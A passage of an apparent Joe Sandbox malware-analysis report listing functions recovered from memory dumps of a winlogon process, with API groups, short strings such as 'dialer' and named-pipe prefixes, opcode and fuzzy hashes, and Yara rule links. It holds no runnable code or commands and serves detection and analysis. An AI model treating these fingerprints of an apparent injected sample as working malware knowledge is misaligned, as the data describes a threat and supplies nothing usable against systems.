                        • FlsGetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D087
                        • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0A6
                        • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0CE
                        • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0DF
                        • FlsSetValue.KERNEL32(?,?,?,000002E99175C7DE,?,?,?,?,?,?,?,?,000002E99175CF9D,?,?,00000001), ref: 000002E99175D0F0
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction ID: a96b1890e74b2ecd0ea9938466009dfee319b739ed4c7e033c1762021a338c56
                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction Fuzzy Hash: 481181207902C242FA69A737D55D3696185BB443F4F16472F983A466EBDF38C4C28E30
                        Function 000002E991757510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: cd15232f422848d1d810b8ca1d68bf3e5a859180c35751ee036576ae4bb720cf
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 4981C3216806C3A6FB50AB6BE44D3A922D4F745780FD7441FAA0987797EB38C9C58F31
                        Function 000002E991759DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction ID: 207c3dd52896e77b572485204b7de8f36d24d6c4bffc08408b80e03efac7f2a8
                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction Fuzzy Hash: 363196223526C2E1EE15DB43E4487656394B74CBA0F9B052F9D1D47792EF39C4C59B20
                        Function 000002E991763DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction ID: 5be6fbadabfa398e5c5c06da23e062949b7ae7d32590008ef573cc00081c362b
                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction Fuzzy Hash: 6B11B231350BC182E7508B13E84831972A4F388FE4F45022AEA5EC7796CF38C4948BA1
                        Function 000002E991752F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction ID: 186717381455e3181557c70e4b3e181aab8ff8ec6f9d2597f1690986fa17b43e
                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction Fuzzy Hash: 6931C522741B92C3EB54DF17E54872967A1FB44BC0F4A402AAE4847B97EF34C4E18B60
                        Function 000002E99175CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction ID: 88b896e7da52e95fd00ccff7768d99056a53124772a0c671c365fb61c8ceb8e1
                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction Fuzzy Hash: 92115E203912C242FA65A733D55D3292185BB447F4F16072EA836467D7DF7884C28F30
                        Function 000002E99175199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction ID: 715ac3fdfa83c77bb0e460137307d450772adbe10476670a3786bf80235cc521
                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction Fuzzy Hash: 17012D21340A8282EB54DB53E45C75963A5F788BC5FCA403AEE5A83756DF3CC989CB50
                        Function 000002E9917536C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction ID: c6f769b54c004a354a452a2a46bf369459501ef8588b7fa1b2b20c3275c221d8
                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction Fuzzy Hash: 69016D6475178282FB249B23E80C71523B0FB49B82F96082EDD4947766EF3CC1888F20
                        Function 000002E991758FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction ID: e9dc35c7a832d2cc683b6cd1fa1022522abd5526910dd1348563b3731bf2def8
                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction Fuzzy Hash: 1851C33274169286EB54CF26E84CB693796F344BC8F52852EDA064778ADB35DCC1CF20
                        Function 000002E991751A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: 412175bfc77c0f7889df0d48bc3560869d283f7d8297d7432b8b3449444d2e85
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: 09F04F223446C292EB608B22F99875967A5F748BC9FC5402ADA498695ADF3CC6CDCF10
                        Function 000002E991753044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction ID: c358c5bd6c370e4e94212374ef1c3ac1b27339a5d47b43ba3a3d7addd493d33b
                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction Fuzzy Hash: 44F08260354BC682EA008B13F91C119A261BB48FC0F85403AEE4A87B2ADF3CC4C58B21
                        Function 000002E99175BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction ID: 25295f8d8ab3043a6409b7c076f3c8c014371e5dc60beb8abb4c75a9d3b53d50
                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction Fuzzy Hash: 27F0966135178691EB108B26E45C3696331FB84BE1F95031FDA6A861F6DF3CC4C5CB61
                        Function 000002E991755710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                        • Instruction ID: 899714654cfee5a0a87d9affd5898931fb4ed2655e43b4f37e6fe9002d5fc822
                        • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                        • Instruction Fuzzy Hash: 4761E736559BC6C7E760DB16E44831AB7E4F388784F52011AEA8E47BAADB7CC590CF10
                        Function 000002E991764104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 8833cec01b3b712e7df5753de1625ed22ad95ee90a5c308719c3cffe9809f191
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 1B11E322BD0AC3A5F66F156AD45D36911407B783F8F1B062FA977876D7CA24C8C08A23
                        Function 000002E991733504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 6fce0c9865f46e94ad79d61300e9938692d5aaaf41cf770363b3baa4ae580780
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 7B11A323BD0AD315FAB4153BF44D36911807B58374F6B862FA9760A2D7CA28CBC34A30
                        Function 000002E99172F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction ID: 27c43efc3ebcb98436fdd8ae9cc1473d170633621c7fc37e2b7ea1367af98575
                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction Fuzzy Hash: 1E61B3625866C642F7658B6BE54C32E26E1F746740FA34C1FCA0A177A7DA34C9C38B30
                        Function 000002E99175AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3544855599-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: c265801518a2bdb581e286e63e256228ab63efdfaaa28672a2b32cc6fb03c2c2
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: CE619F33600B858AEB20DF66D4843AD77B0F344B8CF05462AEF4917B9ADB38C595CB50
                        Function 000002E99175AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: 446d1a1c64522073db0cd5d5834e42522880cf304d97d4b8b40f77ecf9adbd4b
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: DE515E721803C28BEB648B27E58835977A0F354B95F1A512FDA9947BDACB38D4D1CF10
                        Function 000002E99172A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: f3086e5e95a6481f7f96e1afe717cc730f762cabb17a0b2f305e154ee185ea95
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: 1A518D321453C2CAEB648B16D44835877A0F395B94F1A491BDA8987BD7CB78D4D2CF10
                        Function 000002E991728405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: 310a40da76a7e8494b2a523292ada4b4d5fdfe551cf15d0e710db459a0c84222
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: 5C51D63274228287EB14CF17E408B1837D5F354B98F62892EDA564374EE736C9C28F24
                        Function 000002E9917283E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: 4d9fb923a024668931dd26515bb1f8222d8a35d90d0c19900a676a0e9de2e7fc
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 6D31A23124278197E714DF13E84871977E4F744B98F16891EEE9A0778ADB39CA82CF24
                        Function 000002E991762058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction ID: d17a5b66f24651ba47f914fd9a9177c7c4c5eae1cb0dd37e5dc1cb50b43e6a1d
                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction Fuzzy Hash: 0DD10132B14AC18AE751CFBAD4483DC3BB1F3547D8F12821ACE5997B9ADA34C486CB51
                        Function 000002E9917514A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction ID: 958daf10776be36ad14651f8af9b4503ca9b67d81655b7db465c2faf28d38bcd
                        • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction Fuzzy Hash: F4015E32641BD1C6D708DF67E90814A77A0F788FC5F85442AEA4A9371ADF38C091CB91
                        Function 000002E991762980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: dea98d673b1eb583a7a563bef56f37ee4aaf8a9f40eb06f1ad15a2b81e6a3132
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: BD91C3727546D285F7A09F66D4483AD3BA0F744BC8F56410FDE0AA7A96DB34C4C2CB22
                        Function 000002E991757960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction ID: 4a3cbd926c2ff67caed56cc86b37f60de1dd5d3bcd68790c06f0eef6869e381a
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: 31117322750F418AEB00CF61E8593A833B4F318758F850E26EA6D82795DF78C194C790
                        Function 000002E99175253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: 1f9f842b75453c5857f6b2e56ffc77b939292a8ca7035f958eb5257443a8da6b
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: EE71B4362407C2C6E765DF27D8483AA6794F389B84F46042FDE0A53B9ADF35C685CB20
                        Function 000002E991729E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 84d4d0f52c9fe8424e130a51802f206c56cb391b230e05c660d89bf47d82b7fc
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: E6618633601B858AE720DF66D4443AD77B0F348B88F09451AEF4917B99DB38D596CB10
                        Function 000002E991752330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: f62a7e3c712747ec3032839da713c06c279082095f181f860e761592c369468b
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: 4A51F8326843C3C1E6749A2BE05C36A6B61F385784F56012FDD9A03B5BDB39C984CFA0
                        Function 000002E9917626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: 3c3291cdee80793f077ca875b2c93d8f285802d27222ba8780e6ad337528432c
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: 8541D532755B8282DB60CF26E8487A977A0F3987D4F92402AEE4DC7785EB3CC481CB51
                        Function 000002E9917594A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
